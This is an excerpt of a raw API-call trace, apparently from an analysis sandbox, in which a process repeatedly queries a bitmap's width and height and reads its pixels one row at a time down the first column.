[0164.315] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.315] GetLastError () returned 0x57
[0164.316] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.316] GetLastError () returned 0x57
[0164.316] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=1, color=0x19de90) returned 0x0
[0164.316] GetLastError () returned 0x57
[0164.346] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=2, color=0x19de90) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=3, color=0x19de90) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.346] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.346] GetLastError () returned 0x57
[0164.347] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=4, color=0x19de90) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=5, color=0x19de90) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=6, color=0x19de90) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=7, color=0x19de90) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=8, color=0x19de90) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.347] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.347] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=9, color=0x19de90) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=10, color=0x19de90) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=11, color=0x19de90) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=12, color=0x19de90) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=13, color=0x19de90) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=14, color=0x19de90) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.348] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.348] GetLastError () returned 0x57
[0164.349] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=15, color=0x19de90) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=16, color=0x19de90) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=17, color=0x19de90) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=18, color=0x19de90) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=19, color=0x19de90) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=20, color=0x19de90) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.349] GetLastError () returned 0x57
[0164.349] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=21, color=0x19de90) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=22, color=0x19de90) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=23, color=0x19de90) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=24, color=0x19de90) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.350] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=25, color=0x19de90) returned 0x0
[0164.350] GetLastError () returned 0x57
[0164.351] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.351] GetLastError () returned 0x57
[0164.351] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.351] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=26, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=27, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=28, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=29, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=30, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=31, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=32, color=0x19de90) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.352] GetLastError () returned 0x57
[0164.352] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=33, color=0x19de90) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=34, color=0x19de90) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=35, color=0x19de90) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=36, color=0x19de90) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=37, color=0x19de90) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=38, color=0x19de90) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.353] GetLastError () returned 0x57
[0164.353] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=39, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=40, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=41, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=42, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=43, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=44, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=45, color=0x19de90) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.354] GetLastError () returned 0x57
[0164.354] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=46, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=47, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=48, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=49, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=50, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=51, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=52, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.355] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=53, color=0x19de90) returned 0x0
[0164.355] GetLastError () returned 0x57
[0164.356] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=54, color=0x19de90) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=55, color=0x19de90) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=56, color=0x19de90) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=57, color=0x19de90) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=58, color=0x19de90) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.356] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.356] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=59, color=0x19de90) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=60, color=0x19de90) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=61, color=0x19de90) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=62, color=0x19de90) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=63, color=0x19de90) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=64, color=0x19de90) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.357] GetLastError () returned 0x57
[0164.357] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=65, color=0x19de90) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=66, color=0x19de90) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=67, color=0x19de90) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=68, color=0x19de90) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=69, color=0x19de90) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=70, color=0x19de90) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.358] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.358] GetLastError () returned 0x57
[0164.359] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=71, color=0x19de90) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=72, color=0x19de90) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=73, color=0x19de90) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=74, color=0x19de90) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=75, color=0x19de90) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.359] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=76, color=0x19de90) returned 0x0
[0164.359] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipBitmapGetPixel (bitmap=0x657fb18, x=0, y=77, color=0x19de90) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageWidth (image=0x657fb18, width=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
[0164.360] GdipGetImageHeight (image=0x657fb18, height=0x19de80) returned 0x0
[0164.360] GetLastError () returned 0x57
